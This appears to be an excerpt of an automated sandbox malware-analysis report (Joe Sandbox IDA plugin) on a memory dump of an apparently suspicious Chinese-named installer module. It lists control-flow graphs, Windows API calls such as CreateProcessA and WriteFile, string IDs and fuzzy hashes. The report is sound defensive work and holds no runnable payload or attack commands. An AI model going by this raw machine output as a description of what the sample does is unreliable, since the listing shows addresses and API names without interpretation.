                        control_flow_graph 4092 6ca3b750-6ca3b7c0 call 6ca65990 call 6ca6a740 4097 6ca3b7e6-6ca3b7ef 4092->4097 4098 6ca3b7f1-6ca3b7f6 4097->4098 4099 6ca3b850-6ca3b855 4097->4099 4100 6ca3b8b0-6ca3b8b5 4098->4100 4101 6ca3b7fc-6ca3b801 4098->4101 4102 6ca3b950-6ca3b955 4099->4102 4103 6ca3b85b-6ca3b860 4099->4103 4104 6ca3b8bb-6ca3b8c0 4100->4104 4105 6ca3ba0e-6ca3ba13 4100->4105 4106 6ca3b807-6ca3b80c 4101->4106 4107 6ca3b9ac-6ca3b9b1 4101->4107 4108 6ca3ba75-6ca3ba7a 4102->4108 4109 6ca3b95b-6ca3b960 4102->4109 4110 6ca3b866-6ca3b86b 4103->4110 4111 6ca3b9dd-6ca3b9e2 4103->4111 4116 6ca3b8c6-6ca3b8cb 4104->4116 4117 6ca3bb48-6ca3bb4d 4104->4117 4122 6ca3bc79-6ca3bc7e 4105->4122 4123 6ca3ba19-6ca3ba1e 4105->4123 4120 6ca3b812-6ca3b817 4106->4120 4121 6ca3bab6-6ca3babb 4106->4121 4114 6ca3bbf1-6ca3bbf6 4107->4114 4115 6ca3b9b7-6ca3b9bc 4107->4115 4112 6ca3ba80-6ca3ba85 4108->4112 4113 6ca3bcdb-6ca3bce0 4108->4113 4124 6ca3b966-6ca3b96b 4109->4124 4125 6ca3bb9a-6ca3bb9f 4109->4125 4126 6ca3b871-6ca3b876 4110->4126 4127 6ca3bafa-6ca3baff 4110->4127 4118 6ca3b9e8-6ca3b9ed 4111->4118 4119 6ca3bc2c-6ca3bc31 4111->4119 4130 6ca3bff5-6ca3c005 4112->4130 4131 6ca3ba8b-6ca3ba90 4112->4131 4138 6ca3bce6-6ca3bceb 4113->4138 4139 6ca3c22e-6ca3c23e 4113->4139 4154 6ca3c13d-6ca3c15d 4114->4154 4155 6ca3bbfc-6ca3bc01 4114->4155 4146 6ca3b9c2-6ca3b9c7 4115->4146 4147 6ca3bebc-6ca3bf24 4115->4147 4134 6ca3b8d1-6ca3b8d6 4116->4134 4135 6ca3bda6-6ca3bdab 4116->4135 4144 6ca3bb53-6ca3bb58 4117->4144 4145 6ca3bc9a-6ca3bcd6 4117->4145 4150 6ca3b9f3-6ca3b9f8 4118->4150 4151 6ca3bf46-6ca3bf81 call 6ca6a740 call 6ca3a500 4118->4151 4158 6ca3c162-6ca3c193 4119->4158 4159 6ca3bc37-6ca3bc3c 4119->4159 4152 6ca3bd16-6ca3bd1b 4120->4152 4153 6ca3b81d-6ca3b822 4120->4153 4136 6ca3bac1-6ca3bac6 4121->4136 4137 6ca3c026-6ca3c04e 4121->4137 4132 6ca3c1c7-6ca3c1f6 4122->4132 4133 6ca3bc84-6ca3bc89 4122->4133 4156 6ca3ba24-6ca3ba29 4123->4156 4157 6ca3bfab-6ca3bfcb 4123->4157 4142 6ca3b971-6ca3b976 4124->4142 4143 6ca3be2a-6ca3be2f 4124->4143 4148 6ca3c0e0-6ca3c10c 4125->4148 4149 6ca3bba5-6ca3bbaa 4125->4149 4128 6ca3bd43-6ca3bd48 4126->4128 4129 6ca3b87c-6ca3b881 4126->4129 4140 6ca3c082-6ca3c099 4127->4140 4141 6ca3bb05-6ca3bb0a 4127->4141 4172 6ca3c28b-6ca3c29b 4128->4172 4173 6ca3bd4e-6ca3bd53 4128->4173 4162 6ca3b7c2-6ca3b7d3 4129->4162 4163 6ca3b887-6ca3b88c 4129->4163 4188 6ca3c00f-6ca3c01c 4130->4188 4187 6ca3ba96-6ca3ba9b 4131->4187 4131->4188 4132->4097 4164 6ca3c1fb-6ca3c229 4133->4164 4165 6ca3bc8f-6ca3bc94 4133->4165 4166 6ca3be83-6ca3be93 4134->4166 4167 6ca3b8dc-6ca3b8e1 4134->4167 4176 6ca3bdd0-6ca3bdf8 4135->4176 4177 6ca3bdad-6ca3bdb2 4135->4177 4189 6ca3c061-6ca3c07a 4136->4189 4190 6ca3bacc-6ca3bad1 4136->4190 4191 6ca3c054-6ca3c05c 4137->4191 4168 6ca3bcf1-6ca3bcf6 4138->4168 4169 6ca3c248-6ca3c258 4138->4169 4139->4169 4192 6ca3c0a3-6ca3c0c3 4140->4192 4141->4192 4193 6ca3bb10-6ca3bb15 4141->4193 4174 6ca3be9d-6ca3beb7 4142->4174 4175 6ca3b97c-6ca3b981 4142->4175 4180 6ca3c2a5-6ca3c2aa 4143->4180 4181 6ca3be35-6ca3be7e 4143->4181 4194 6ca3c0c8-6ca3c0d8 4144->4194 4195 6ca3bb5e-6ca3bb63 4144->4195 4145->4097 4178 6ca3bf29-6ca3bf3e 4146->4178 4179 6ca3b9cd-6ca3b9d2 4146->4179 4147->4097 4148->4097 4196 6ca3c111-6ca3c138 4149->4196 4197 6ca3bbb0-6ca3bbb5 4149->4197 4182 6ca3b9fe-6ca3ba03 4150->4182 4183 6ca3bdfd-6ca3be25 4150->4183 4228 6ca3bf86-6ca3bfa6 4151->4228 4170 6ca3c262-6ca3c286 4152->4170 4171 6ca3bd21-6ca3bd26 4152->4171 4153->4176 4198 6ca3b828-6ca3b82d 4153->4198 4154->4097 4155->4145 4199 6ca3bc07-6ca3bc0c 4155->4199 4184 6ca3bfd0-6ca3bff0 4156->4184 4185 6ca3ba2f-6ca3ba34 4156->4185 4157->4097 4158->4097 4160 6ca3bc42-6ca3bc47 4159->4160 4161 6ca3c198-6ca3c1c2 call 6ca6a1c0 4159->4161 4160->4097 4200 6ca3bc4d-6ca3bc74 4160->4200 4161->4097 4218 6ca3b7d8-6ca3b7dd 4162->4218 4163->4097 4201 6ca3b892-6ca3b89f 4163->4201 4164->4097 4165->4097 4165->4145 4166->4174 4167->4097 4203 6ca3b8e7-6ca3b94a call 6ca3c2c0 CreateFileA 4167->4203 4168->4097 4204 6ca3bcfc-6ca3bd11 4168->4204 4169->4170 4170->4097 4171->4097 4205 6ca3bd2c-6ca3bd39 4171->4205 4172->4180 4173->4097 4206 6ca3bd59-6ca3bda1 4173->4206 4210 6ca3b7e0-6ca3b7e4 4174->4210 4175->4097 4207 6ca3b987-6ca3b9a7 4175->4207 4176->4097 4177->4097 4208 6ca3bdb8-6ca3bdc8 4177->4208 4178->4151 4179->4183 4209 6ca3b9d8 4179->4209 4180->4097 4202 6ca3c2b0-6ca3c2bb 4180->4202 4181->4210 4182->4176 4211 6ca3ba09 4182->4211 4183->4097 4184->4097 4185->4097 4212 6ca3ba3a-6ca3ba70 4185->4212 4187->4097 4214 6ca3baa1-6ca3bab1 4187->4214 4188->4137 4189->4140 4190->4097 4215 6ca3bad7-6ca3baf1 4190->4215 4191->4097 4192->4097 4193->4097 4216 6ca3bb1b-6ca3bb43 4193->4216 4194->4148 4195->4097 4217 6ca3bb69-6ca3bb95 4195->4217 4196->4097 4197->4097 4219 6ca3bbbb-6ca3bbec call 6ca318a0 call 6ca318b0 4197->4219 4198->4097 4221 6ca3b82f-6ca3b841 4198->4221 4199->4097 4222 6ca3bc12-6ca3bc27 4199->4222 4200->4097 4201->4218 4203->4097 4204->4097 4205->4128 4206->4097 4207->4191 4208->4176 4209->4097 4210->4097 4211->4097 4212->4097 4214->4210 4215->4127 4216->4097 4217->4097 4218->4210 4219->4097 4221->4210 4222->4097 4228->4097
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 1:x$1:x$wtU'$xtU'$xtU'
                        • API String ID: 0-2932700092
                        • Opcode ID: 9b4856b8728b786745082b4373a70125be5915d7e549735cfe0035c357d8dc81
                        • Instruction ID: 3688b6b974a06472e5cfbaa3acc19bc95f770fc3b20b0697886f171545ddc965
                        • Opcode Fuzzy Hash: 9b4856b8728b786745082b4373a70125be5915d7e549735cfe0035c357d8dc81
                        • Instruction Fuzzy Hash: 4D52267460D7A19FC714CE28D4A061ABBE2AFCA354F28AE1EE499C7750D634D884CB53
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: ;T55
                        • API String ID: 0-2572755013
                        • Opcode ID: 09482a192fb64eab88c403e1a92e1a7b215ea9923e817f22a2c9b35846c4ab76
                        • Instruction ID: 5dfb7af7c4df8253349a0966dbfcf21bcc915d250a43febee11ccd801a3864e3
                        • Opcode Fuzzy Hash: 09482a192fb64eab88c403e1a92e1a7b215ea9923e817f22a2c9b35846c4ab76
                        • Instruction Fuzzy Hash: D103C131645B018FC738CF28C9D0696B7E2AFD53287198F6DC0AA4BA95DB74B44ACB50

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4627 6ca63e00-6ca63e87 CreateProcessA 4628 6ca63eab-6ca63eb4 4627->4628 4629 6ca63eb6-6ca63ebb 4628->4629 4630 6ca63ed0-6ca63f1a WaitForSingleObject CloseHandle * 2 4628->4630 4631 6ca63e90-6ca63ea3 4629->4631 4632 6ca63ebd-6ca63ec2 4629->4632 4630->4628 4631->4628 4632->4628 4633 6ca63ec4-6ca63f27 4632->4633
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CloseHandle$CreateObjectProcessSingleWait
                        • String ID: D
                        • API String ID: 2059082233-2746444292
                        • Opcode ID: f0c67256424a757f1bb5ccf3a2063e450ebf5e5e989eab21c8d5670c3d3a7cde
                        • Instruction ID: f89f7ebaa3270f16e19050584a7ce29bd1eb9f7d7889bd1413697c4489b88858
                        • Opcode Fuzzy Hash: f0c67256424a757f1bb5ccf3a2063e450ebf5e5e989eab21c8d5670c3d3a7cde
                        • Instruction Fuzzy Hash: FF31E2B19093408FD750DF29C19876EBBF0AB89308F505A1EF9D9972A0E7749585CF43

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4635 6ca7aa7e-6ca7aa9a 4636 6ca7aaa0-6ca7aaa2 4635->4636 4637 6ca7ac59 4635->4637 4638 6ca7aac4-6ca7aae5 4636->4638 4639 6ca7aaa4-6ca7aab7 call 6ca6e7ff call 6ca6e7ec call 6ca6ef40 4636->4639 4640 6ca7ac5b-6ca7ac5f 4637->4640 4641 6ca7aae7-6ca7aaea 4638->4641 4642 6ca7aaec-6ca7aaf2 4638->4642 4655 6ca7aabc-6ca7aabf 4639->4655 4641->4642 4644 6ca7aaf4-6ca7aaf9 4641->4644 4642->4639 4642->4644 4647 6ca7aafb-6ca7ab07 call 6ca79a89 4644->4647 4648 6ca7ab0a-6ca7ab1b call 6ca7ac60 4644->4648 4647->4648 4656 6ca7ab1d-6ca7ab1f 4648->4656 4657 6ca7ab5c-6ca7ab6e 4648->4657 4655->4640 4660 6ca7ab46-6ca7ab52 call 6ca7acd1 4656->4660 4661 6ca7ab21-6ca7ab29 4656->4661 4658 6ca7abb5-6ca7abd7 WriteFile 4657->4658 4659 6ca7ab70-6ca7ab79 4657->4659 4664 6ca7abe2 4658->4664 4665 6ca7abd9-6ca7abdf GetLastError 4658->4665 4667 6ca7aba5-6ca7abb3 call 6ca7b0e3 4659->4667 4668 6ca7ab7b-6ca7ab7e 4659->4668 4671 6ca7ab57-6ca7ab5a 4660->4671 4662 6ca7ab2f-6ca7ab3c call 6ca7b07b 4661->4662 4663 6ca7abeb-6ca7abee 4661->4663 4678 6ca7ab3f-6ca7ab41 4662->4678 4673 6ca7abf1-6ca7abf6 4663->4673 4672 6ca7abe5-6ca7abea 4664->4672 4665->4664 4667->4671 4674 6ca7ab95-6ca7aba3 call 6ca7b2a7 4668->4674 4675 6ca7ab80-6ca7ab83 4668->4675 4671->4678 4672->4663 4679 6ca7ac54-6ca7ac57 4673->4679 4680 6ca7abf8-6ca7abfd 4673->4680 4674->4671 4675->4673 4681 6ca7ab85-6ca7ab93 call 6ca7b1be 4675->4681 4678->4672 4679->4640 4684 6ca7abff-6ca7ac04 4680->4684 4685 6ca7ac29-6ca7ac35 4680->4685 4681->4671 4689 6ca7ac06-6ca7ac18 call 6ca6e7ec call 6ca6e7ff 4684->4689 4690 6ca7ac1d-6ca7ac24 call 6ca6e812 4684->4690 4687 6ca7ac37-6ca7ac3a 4685->4687 4688 6ca7ac3c-6ca7ac4f call 6ca6e7ec call 6ca6e7ff 4685->4688 4687->4637 4687->4688 4688->4655 4689->4655 4690->4655
                        APIs
                          • Part of subcall function 6CA7ACD1: GetConsoleCP.KERNEL32(?,6CA79EF0,?), ref: 6CA7AD19
                        • WriteFile.KERNEL32(?,?,6CA8350C,00000000,00000000,?,00000000,00000000,6CA848D6,00000000,00000000,?,00000000,6CA79EF0,6CA8350C,00000000), ref: 6CA7ABCF
                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA8350C,6CA79EF0,00000000,?,?,?,?,00000000,?), ref: 6CA7ABD9
                        • __dosmaperr.LIBCMT ref: 6CA7AC1E
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: ConsoleErrorFileLastWrite__dosmaperr
                        • String ID: 8Q
                        • API String ID: 251514795-4022487301
                        • Opcode ID: f5401e4477591aa02ce80b9cf281c2dc182688a22a6bb548efac9c5d2b7c31da
                        • Instruction ID: e67e2c5a1f21322132b8877ddf7d0f9cecd4a4c51047ec3703fd7efbbeb818a6
                        • Opcode Fuzzy Hash: f5401e4477591aa02ce80b9cf281c2dc182688a22a6bb548efac9c5d2b7c31da
                        • Instruction Fuzzy Hash: 6051B179A04109BFDF218FA9C980BDEBBBAFF46318F181551E510ABA50D730DD8987B1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4702 6ca649b0-6ca649bc 4703 6ca649be-6ca649c9 4702->4703 4704 6ca649fd 4702->4704 4706 6ca649df-6ca649ec call 6c9301f0 call 6ca6f938 4703->4706 4707 6ca649cb-6ca649dd 4703->4707 4705 6ca649ff-6ca64a77 4704->4705 4708 6ca64aa3-6ca64aa9 4705->4708 4709 6ca64a79-6ca64aa1 4705->4709 4715 6ca649f1-6ca649fb 4706->4715 4707->4706 4709->4708 4712 6ca64aaa-6ca64b69 call 6c932250 call 6c932340 call 6ca68199 call 6c92e010 call 6ca65ea8 4709->4712 4715->4705
                        APIs
                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA64B51
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Ios_base_dtorstd::ios_base::_
                        • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                        • API String ID: 323602529-1866435925
                        • Opcode ID: c1465ef60ad7974bb8a744ef5bdc9fff880c1d4bf54ca6138b74930d98b805e6
                        • Instruction ID: b1c5623705d5c37773742c82816a948b308b24a808cd492535dca2d9b8057cbe
                        • Opcode Fuzzy Hash: c1465ef60ad7974bb8a744ef5bdc9fff880c1d4bf54ca6138b74930d98b805e6
                        • Instruction Fuzzy Hash: 555143B5500B008FD729CF2AC595B97BBF1FB58318F008A2DD8864BB91D775A949CB90

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4739 6ca3c310-6ca3c36c call 6ca65990 4742 6ca3c3c0-6ca3c3c9 4739->4742 4743 6ca3c410-6ca3c415 4742->4743 4744 6ca3c3cb-6ca3c3d0 4742->4744 4747 6ca3c41b-6ca3c420 4743->4747 4748 6ca3c4f8-6ca3c4fd 4743->4748 4745 6ca3c460-6ca3c465 4744->4745 4746 6ca3c3d6-6ca3c3db 4744->4746 4755 6ca3c46b-6ca3c470 4745->4755 4756 6ca3c59c-6ca3c5b4 4745->4756 4751 6ca3c3e1-6ca3c3e6 4746->4751 4752 6ca3c51d-6ca3c531 WriteFile 4746->4752 4753 6ca3c567-6ca3c597 call 6ca6a1c0 4747->4753 4754 6ca3c426-6ca3c42b 4747->4754 4749 6ca3c503-6ca3c508 4748->4749 4750 6ca3c5e6-6ca3c5fd WriteFile 4748->4750 4757 6ca3c607-6ca3c60c 4749->4757 4758 6ca3c50e-6ca3c513 4749->4758 4750->4757 4759 6ca3c53b-6ca3c55f 4751->4759 4760 6ca3c3ec-6ca3c3f1 4751->4760 4752->4759 4753->4742 4762 6ca3c431-6ca3c436 4754->4762 4763 6ca3c36e-6ca3c3b0 call 6ca6a740 ReadFile 4754->4763 4764 6ca3c476-6ca3c47b 4755->4764 4765 6ca3c5bc-6ca3c5d0 4755->4765 4756->4765 4757->4742 4766 6ca3c612-6ca3c620 4757->4766 4758->4752 4759->4753 4760->4742 4767 6ca3c3f3-6ca3c406 4760->4767 4762->4742 4769 6ca3c438-6ca3c452 4762->4769 4773 6ca3c3b3-6ca3c3b8 4763->4773 4764->4742 4771 6ca3c481-6ca3c4ee WriteFile 4764->4771 4772 6ca3c5d4-6ca3c5e1 4765->4772 4767->4773 4769->4772 4771->4748 4772->4742 4773->4742
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ae9b87645ec15ac78331fd2ec0dad74a0f16d9bef2944a5a0757659818a965cf
                        • Instruction ID: e625e93d5e39ff54f902045fd60d192800ef345a3bd211afd0d6a0857be91d65
                        • Opcode Fuzzy Hash: ae9b87645ec15ac78331fd2ec0dad74a0f16d9bef2944a5a0757659818a965cf
                        • Instruction Fuzzy Hash: 90717AB0208325AFD700DF15C89079EFBE4BF89318F509A2EF599CB650D775D8988B52

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 4797 6ca7a745-6ca7a759 call 6ca803c2 4800 6ca7a75f-6ca7a767 4797->4800 4801 6ca7a75b-6ca7a75d 4797->4801 4803 6ca7a772-6ca7a775 4800->4803 4804 6ca7a769-6ca7a770 4800->4804 4802 6ca7a7ad-6ca7a7cd call 6ca8053f 4801->4802 4812 6ca7a7cf-6ca7a7d9 call 6ca6e812 4802->4812 4813 6ca7a7db 4802->4813 4806 6ca7a777-6ca7a77b 4803->4806 4807 6ca7a793-6ca7a7a3 call 6ca803c2 CloseHandle 4803->4807 4804->4803 4805 6ca7a77d-6ca7a791 call 6ca803c2 * 2 4804->4805 4805->4801 4805->4807 4806->4805 4806->4807 4807->4801 4819 6ca7a7a5-6ca7a7ab GetLastError 4807->4819 4817 6ca7a7dd-6ca7a7e0 4812->4817 4813->4817 4819->4802
                        APIs
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,6CA8307F), ref: 6CA7A79B
                        • GetLastError.KERNEL32(?,00000000,?,6CA8307F), ref: 6CA7A7A5
                        • __dosmaperr.LIBCMT ref: 6CA7A7D0
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: CloseErrorHandleLast__dosmaperr
                        • String ID:
                        • API String ID: 2583163307-0
                        • Opcode ID: 0ee5219624bffe0a20007ae3084c4ceba3f8d52fbfccad6493e3c744971180da
                        • Instruction ID: df011e572a7788d198afe8145bd779d354372aabcd6291a7d9ea8f5bccee7b1a
                        • Opcode Fuzzy Hash: 0ee5219624bffe0a20007ae3084c4ceba3f8d52fbfccad6493e3c744971180da
                        • Instruction Fuzzy Hash: 5D014C3670715027C124063994847AD2776AB8373CF2D5319E514D7AC2DF28CCC951A0
                        Strings
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID:
                        • String ID: 8Q
                        • API String ID: 0-4022487301
                        • Opcode ID: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                        • Instruction ID: e8a0bd02f984a47ebd13ee455355f836d5182b93ea432f45bbedb7205fac21eb
                        • Opcode Fuzzy Hash: 0eceabb69cc212cdc16fe4ea4eed4d534fb07063be66ce5869ee3001f537518c
                        • Instruction Fuzzy Hash: A9F0F4366126186ACA315A7FCE007CA33A99F5233DF290719E86597FC0DB70D48E86F1
                        APIs
                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA648D4
                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA64914
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1926382787.000000006CC4D000.00000002.00000001.01000000.00000009.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_6_2_6c8e0000_#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.jbxd
                        Similarity
                        • API ID: Ios_base_dtorstd::ios_base::_
                        • String ID:
                        • API String ID: 323602529-0
                        • Opcode ID: 61fe2cf4e8508e94ec9a661aafa8874b60c214ed7789f2cf4ee7e582c7802a1e
                        • Instruction ID: 91185e6c46ad1a0630debde7e31336c17afdf89e517b9fe029299abc0f33a038
                        • Opcode Fuzzy Hash: 61fe2cf4e8508e94ec9a661aafa8874b60c214ed7789f2cf4ee7e582c7802a1e
                        • Instruction Fuzzy Hash: 3E512771205B40DBE725CF25C994BD6BBF4BB05718F448A1CE4AA4BB91D730F589CB80
                        APIs
                        • GetLastError.KERNEL32(6CA94DD8,0000000C), ref: 6CA6DD72
                        • ExitThread.KERNEL32 ref: 6CA6DD79
                        Memory Dump Source
                        • Source File: 00000006.00000002.1923884064.000000006C8E1000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C8E0000, based on PE: true
                        • Associated: 00000006.00000002.1923861024.000000006C8E0000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925035460.000000006CA86000.00000002.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925695581.000000006CB61000.00000004.00000001.01000000.00000009.sdmpDownload File
                        • Associated: 00000006.00000002.1925724644.000000006CB67000.00000020.00000001.01000000.00000009.sdmpDownload File
